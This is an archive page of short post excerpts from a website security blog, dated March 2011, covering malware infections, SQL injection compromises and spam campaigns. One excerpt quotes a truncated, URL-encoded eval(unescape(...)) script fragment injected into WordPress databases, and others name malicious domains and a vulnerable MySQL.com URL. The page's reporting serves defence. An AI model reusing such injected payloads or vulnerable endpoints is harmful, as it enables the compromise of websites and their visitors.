Monthly Archives: March 2011

The “div_colors” Malware Update

We are still seeing a big growth in the number of sites infected with the div_colors malware string. In fact, the osCommerce forums are full of people asking about it, uncertain what to do, and what it does. So, what …


Posted in blacklisted, hacked, malware, malware_updates, oscommerce | 4 Comments

Will Google blacklist itself?

We were analyzing an infected site today and their Google blacklist diagnostic said the following: Has this site hosted malware? Yes, this site has hosted malicious software over the past 90 days. It infected 3 domain(s), including site.com/, google.com/. Hum… …


Posted in blacklisted, google | 3 Comments

Malware week: The div_colors, CreateCSS and others

We are starting to see an interesting trend regarding how the latest web-based malware is being distributed. Instead of heavily encoding the malicious code on the infected web sites, attackers are now trying to make it look like legitimate code. …


Posted in hacked, malware, malware_updates, oscommerce | 1 Comment

MySQL.com compromised

MySQL.com (the official site for the MySQL database) was compromised via (shocking!) blind SQL injection. A post was sent today to the full disclosure list explaining the issue and dumping part of their internal database structure. Vulnerable Target : http://mysql.com/customers/view/index.html?id=1170 …


Posted in hacked, security | 38 Comments

Database injection and lessthenaminutehandle.com – Intermediary domains

We posted a few days ago about a large scale database injection attack affecting shared hosts. The infected sites got the following javascript malware inserted on every post of their database (generally the wp-post table on WordPress): <script>eval(unescape("%64%6F%63%75%6D%65%6E%74%2E%77%72.. 70%3F%6B%6B%3D%33%33%22%3E%3C%2F%73%63%72%69%70%74%3E%27%29%3B".. Which …


Posted in blacklisted, godaddy, hacked, malware, malware_updates | Leave a comment

Attacks against IIS/ASP sites – alisa-carter dot com

Over the last few days, we’ve seen a number of sites getting hacked with a malware script pointing to http://alisa-carter.com/ur.php. It is done using the same SQL injection attack as used in the robint-us mass infection a few months ago. …


Posted in blacklisted, hacked, iis | 1 Comment

Tumblr mistake or security issue

There is a post on Hacker News about a possible security issue with Tumblr. Basically a lot of confidential information, including server IPs, API keys, passwords, etc., was leaked. Here is some of the stuff that was disclosed: Database::set_defaults(array( ‘user’ …


Posted in security | 6 Comments

Database injection, Hilary Kneber and lessthenaminutehandle dot com

We posted a few weeks ago about a database injection attack that infected thousands of WordPress blogs on shared hosts. At that time, the attackers were inserting a javascript link pointing to welcometotheglobalisnet.com/js.php?kk=25 in all the posts in the database. …


Posted in godaddy, hacked, malware, malware_updates, wordpress | 8 Comments

Solution for the link injection spam from basicpills

We recently posted about a large scale blackhat SEO campaign by basicpills that infected thousands of WordPress sites over the last few weeks. A lot of people contacted us for help and asked for directions on how to remove those …


Posted in malware, malware_updates, pharma, spam, wordpress | 10 Comments

Oracle.com, Wetpaint, Spammers, and the Tale of an Unmoderated Wiki

Update: A few hours after this post went live, it seems that Oracle started to clean up the wiki. Very good! Oracle’s official Wiki (at http://wiki.oracle.com) is becoming a haven for spammers. The site has a high page rank …


Posted in oracle, pharma, spam | 1 Comment